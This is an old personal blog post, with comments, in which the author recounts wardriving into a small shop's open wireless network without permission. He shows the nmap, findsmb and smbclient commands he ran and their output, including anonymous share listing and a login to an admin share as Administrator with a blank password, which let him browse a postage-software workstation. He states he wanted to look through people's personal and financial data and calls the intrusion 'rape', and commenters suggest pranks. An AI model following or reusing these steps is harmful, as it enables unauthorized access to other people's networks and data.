Wednesday, November 02, 2005

Invading Print Servers
It's been a while since I did some real network invasion. And today, my homesick depression was reaching an all time high ... so I felt making a few stops might be in order.

On my way back to the hotel, I caught a glimpse of what looked like the edge of a strip mall which I thought might be interesting. I had to make a few turns to get into the parking lot, and it almost seemed like they were hiding it from the main highway. The mall was buried behind towering townhouse condos. As I made my way down a small winding road, I came upon this strange ... village. It was quite an impressive real estate project. The condos were narrow, but stood about four stories high. Some of the condos were actually businesses on the bottom. The problem was ... no parking. So as I spun around in my Bug, all I could wonder was "where the fuck do people park around here?". Hell, I might have even stopped into Quizno's for a sub. But after passing the place three times looking for a place to park my car, I gave up and waved goodbye. None of these little businesses looked all that busy, and I could now see why.

As I drove around in circles, Audrey (the laptop) was going nuts. I had KisMac running, and I was picking up an access point at a rate of about every two seconds. By the time I found a spot and parked in it ... I was down to a single access point. But that's okay. I can only rape one at a time, right? Looking ahead of me, I determined that this access point must belong to one of the following businesses: a hair and nail shop, a mailbox shop, an eyeglasses shop, or a small grocery store. The access point, "linksys", happily accepted me as a visitor and set me up with an address to use. I opened a terminal and went right to work.

My first goal was to get an idea of what was on this network (other than me). So I did a simple nmap scan, and dumped that into a file like this ...

audrey-ii:~ rayhaque$ nmap 192.168.2.1-254 > nmap.log

While that was running (and it was taking its sweet time), I hopped to a second terminal and ran "findsmb". This is an old samba utility which does an MS Windows style "network browse". The idea being that any Windows-like file server in the immediate network will 'holler back'.

audrey-ii:~ rayhaque$ findsmb

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
---------------------------------------------------------------------
192.168.2.100 E-710-109987 +[WORKGROUP] [Windows NT 4.0] [NT LAN Manager 4.0]
audrey-ii:~ rayhaque$ smbclient //192.168.2.100


Hooray, I am not alone. But wait just a damned minute. When was the last time you came across a server running Windows NT? I had my doubts. Usually when nmap tells you that it found an NT server, it's actually found some sort of network appliance.

Next I ran "smbclient" and used it to get a dump of file shares from my new friend. Notice it prompted me for a password, and I declined to offer one up. This indicated that it was okay listing its shares to an anonymous guy like me.

audrey-ii:~ rayhaque$ smbclient -L //E-710-109987
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]

Sharename Type Comment
--------- ---- -------
direct Printer direct
ADMIN$ Disk Remote Admin
IPC$ IPC Remote IPC
print Printer print
C$ Disk Default share
D$ Disk Default share
E$ Disk Default share
print$ Disk Printer Drivers
hold Printer hold
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]

Server Comment
--------- -------
E-710-109987

Workgroup Master
--------- -------
MSOFFICE MASTER
WORKGROUP E-710-109987


What the hell is this thing? Is it a print server? Is it just one of those glorified network printers, with PC-like functionality? I decided to try and connect to one of these shared drives and check it out. And while the C$ share most certainly contains the OS, I am wanting to poke through someone's personal data or financial information. That's what really makes these sick little excursions worthwhile.

audrey-ii:~ rayhaque$ smbclient //E-710-109987/e$
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
tree connect failed: NT_STATUS_ACCESS_DENIED


Oh ... so you aren't happy with allowing guests access to your hidden shares? Aren't we picky. How about ... administrators? Any love for an Administrator, with a blank password?

audrey-ii:~ rayhaque$ smbclient //E-710-109987/e$ -U Administrator
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \>


That's what I'm talking about. What we have here is an SMB browsing session in progress. It's awaiting my command. Likely, I can now begin searching through files, and if I find something I like, I can "get" it.

smb: \> ls
efi D 0 Wed Oct 30 16:16:53 2002
spool D 0 Mon Apr 26 15:10:28 2004

50516 blocks of size 131072. 48395 blocks available
smb: \>


What on earth? After some poking around in and out of the shares I came to the conclusion that ... this was nothing but a print server. An utterly boring print server. By this time my nmap scan had finished, and I looked through it for my next victim. This was a strange network, in that it had several clients attached to it, but had no Internet gateway, or DNS resolution. It was truly a "workgroup". These networks give me a 'big rubbery one', because most companies don't bother with any level of security. Why? Because they aren't connected to anything. Never mind the wireless signal that I used to waltz in from the parking lot.

I poked through my nmap file again and targeted my next victim. This server (?) had the address typically reserved for a gateway/router. Yet, it was a dead end for packets. So I made an attempt to talk to it as a Windows file server. I did a simple anonymous style "share list" against it. It obliged.

audrey-ii:~ rayhaque$ smbclient -L //192.168.2.1
Password:
Anonymous login successful
Domain=[MSOFFICE] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
session request to 192.168.2.1 failed (Called name not present)
session request to 192 failed (Called name not present)
Anonymous login successful
Domain=[MSOFFICE] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------
AUX1
AUX2
MASTER

Workgroup Master
--------- -------
MSOFFICE MASTER
WORKGROUP E-710-109987


This could be interesting, although it may just be another network appliance screwing with me. I think I will check out a different host. Maybe this 192.168.2.4 character. Perhaps it's an actual running PC of some kind.

audrey-ii:~ rayhaque$ smbclient -L //192.168.2.4
Password:
Domain=[MASTER] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
PC Synergy Disk
IPC$ IPC Remote IPC
C Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
session request to 192.168.2.4 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[MASTER] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------


Uh yeah ... this looks like another print server thing. God, I have found the most uninteresting network imaginable to inhabit. But I will look around anyway. This "PC Synergy" thing could possibly be something interesting.

audrey-ii:~ rayhaque$ smbclient "//192.168.2.4/PC Synergy" -U guest
Password:
Domain=[MASTER] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
smb: \> ls
. D 0 Wed Oct 19 07:07:55 2005
.. D 0 Wed Oct 19 07:07:55 2005
PostalMate D 0 Wed Nov 2 16:43:11 2005
POSTALMATEActGrp.xml A 0 Wed Oct 19 07:07:55 2005

38170 blocks of size 524288. 31427 blocks available
smb: \> cd PostalMate
smb: \PostalMate\> ls
. D 0 Wed Nov 2 16:43:11 2005
.. D 0 Wed Nov 2 16:43:11 2005
32767.bmp A 12598 Thu Jun 22 09:51:44 2000
32768.bmp A 49256 Mon Aug 16 08:23:56 2004
32769.bmp A 14470 Mon Dec 4 14:02:26 2000
32770.bmp A 58266 Tue Feb 11 12:10:44 2003
32771.bmp A 15406 Tue Nov 25 07:49:24 2003
32772.bmp A 26100 Thu Sep 23 08:34:46 2004
borlndmm.dll A 25600 Mon Jan 24 06:01:00 2000
CashMate.chm A 228029 Mon Jun 20 13:58:10 2005
Cashmate.exe A 5968384 Thu Sep 22 08:01:00 2005
CashMate.GID AH 41663 Tue Sep 20 13:09:30 2005
Close.exe A 403456 Wed Jul 13 11:26:04 2005
complog.err A 0 Fri Dec 31 16:50:32 2004
DataPurge.dll A 775168 Wed Oct 5 15:25:24 2005
DropOff.dll A 1475072 Wed Oct 5 15:25:24 2005
ElabelSample.txt A 10811 Wed Jan 31 15:02:52 2001
ENHTRKLog.txt A 981 Thu Sep 19 15:04:44 2002
EnhTrkuRsp.txt A 5002 Sun Dec 23 12:08:08 2001
Events.dll A 681984 Wed Oct 5 14:36:35 2005
Events.log A 18221 Wed Oct 5 15:24:59 2005
FedExExpress_QuickRateSettingLog.txt A 408 Thu Jan 6 08:12:24 2005
Global Express Mail.lyt A 2436 Sun Feb 15 21:04:10 2004
Import A 561152 Fri Jan 23 07:45:44 2004
INSTALL.LOG A 7708 Wed Oct 5 15:25:04 2005
libeay32.dll A 651264 Sun Apr 18 16:43:44 2004
License.txt A 18316 Mon Aug 2 09:18:46 2004
Log D 0 Wed Nov 2 08:09:52 2005
MCStrings.txt A 381 Mon Jul 1 13:58:34 2002
midas.dll A 297984 Fri Mar 4 09:02:00 2005
MsgAction1.dll A 695296 Wed Oct 5 15:25:25 2005
MsgDownload.dll A 1114112 Wed Oct 5 15:25:23 2005
MsgRun.dll A 2130432 Wed Oct 5 15:25:23 2005
PDOXUSRS.LCK A 6752256 Wed Nov 2 08:07:29 2005
PDXRBLD.exe A 899072 Wed Jun 22 07:41:00 2005
Pdxrbld.INI A 81 Thu Oct 6 14:28:43 2005
Pdxrbld.LOG A 236 Thu Oct 6 14:27:25 2005
Pdxrbld2.exe A 603648 Fri Aug 3 13:21:00 2001
PMExceptions.txt A 164 Tue Sep 27 10:30:09 2005
PMShipment A 7512 Wed Jan 14 17:09:44 2004
PM_ImportFile.txt A 5359 Mon Oct 23 18:23:16 2000
PM_Win.exe A 15211520 Thu Sep 22 08:00:24 2005
PostalMate.chm A 504423 Tue Sep 6 10:23:56 2005
PostalMate.GID AH 71480 Sat Sep 24 12:44:18 2005
Pre_5_5_5.zip A 481140 Wed Oct 5 15:25:22 2005
Readme.txt A 156358 Wed Sep 21 14:15:22 2005
Setbrows.exe A 4528 Fri Oct 13 15:28:28 1995
ssleay32.dll A 147456 Sun Apr 18 16:43:46 2004
SystemCheck.exe A 941056 Wed Aug 3 10:40:14 2005
SystemUtilities.exe A 2625536 Thu Sep 22 08:01:26 2005
SysUtil.chm A 90859 Wed Aug 31 12:36:02 2005
Tables D 0 Wed Nov 2 17:10:36 2005
UNWISE.EXE A 153088 Fri Jul 26 15:02:06 2002
WSExport.dll A 693760 Thu Aug 11 12:46:18 2005
XMLTransform.dll A 434688 Wed Oct 5 14:36:34 2005
Zebra Dom 1.lyt A 2629 Thu Feb 17 13:45:02 2005
Zebra Dom 2.lyt A 2671 Tue Jun 7 13:53:30 2005
Zebra Dom Express.lyt A 2571 Thu Feb 17 13:45:02 2005
Zebra Dom Postcard.lyt A 2605 Thu Nov 4 09:23:24 2004
Zebra Intl 1.lyt A 3208 Wed Dec 15 07:38:52 2004
Zebra Intl 2.lyt A 2628 Thu Nov 4 09:23:24 2004
_QSQ6.DB A 3008512 Wed Nov 2 08:55:20 2005

38170 blocks of size 524288. 31427 blocks available
smb: \PostalMate\>


Oh - MY - GOD. I am talking to a postage machine. Well, now I know what shop I had targeted. It was the mailbox shop. This had to be the most uneventful adventure EVER. So why did I ever record it for you to read? Why did you even read through all this?

Go away. You bother me.

Historic Comments
Get a Google Map of the place with no parking lots. Perhaps there's parking that you couldn't find. If there truly is no parking there, please post a google maps picture of one of the strangest streets I've ever heard of.

And you should have tried to print some crap out of one of those printers. Something like "I quit" or "The rebellion begins NOW!"
Poe | 11.03.05 - 10:05 pm | #

Hey, Google Maps! Here is a satellite photo of the area. The spot I was in is north of "Beacon Square". It doesn't look like much from this altitude though. You can't make out the intricate little weavings of roads between the big buildings. Like a small German town. From this map, it doesn't even look like the same place. Or maybe it isn't the same place. Perhaps I'm lost. You can see by the picture that there are parking lots above, beside, and below the 'campus'. But these were marked "permit only", and filled up by the condo dwellers.

I was trying to find the Marathon gas station which would have been a good land mark, but it doesn't seem to exist.

It's a government conspiracy.
Ray Dios Haque | 11.04.05 - 3:03 pm | #

Woops ... forgot the map link. Here that is ...

http://maps.google.com/maps?q=qu...06829&t=h& hl=en
Ray Dios Haque | 11.04.05 - 3:04 pm | #

Jesus, those streets are a nightmare. You couldn't find the Quizno's on the map? I tried Google for that, but they all seem to have parking lots. Could be that most of their customers live in nearby apartments, condos, etc. Or those buildings could just be covers for machinery supporting a huge underground government facility. Raccoon City anyone?
Poe | 11.05.05 - 1:51 am | #

Whee, wardriving stories. I need to get me a damn laptop.
SiliconSnake | Homepage | 11.07.05 - 5:09 pm | #

Raaaaaaay. What IRC channel are you haunting now? I miss the milkshake contests. :P
conundrum | 12.07.05 - 11:44 pm | #

The machine you connected to was a Windows workstation running a shipping system called "Postalmate 2000" authored by a company called "pcsynergy".
anon | 12.29.06 - 11:57 am | #

You can use nbtenum to enum smb accounts/shares.
jc | 06.06.07 - 10:51 am | #
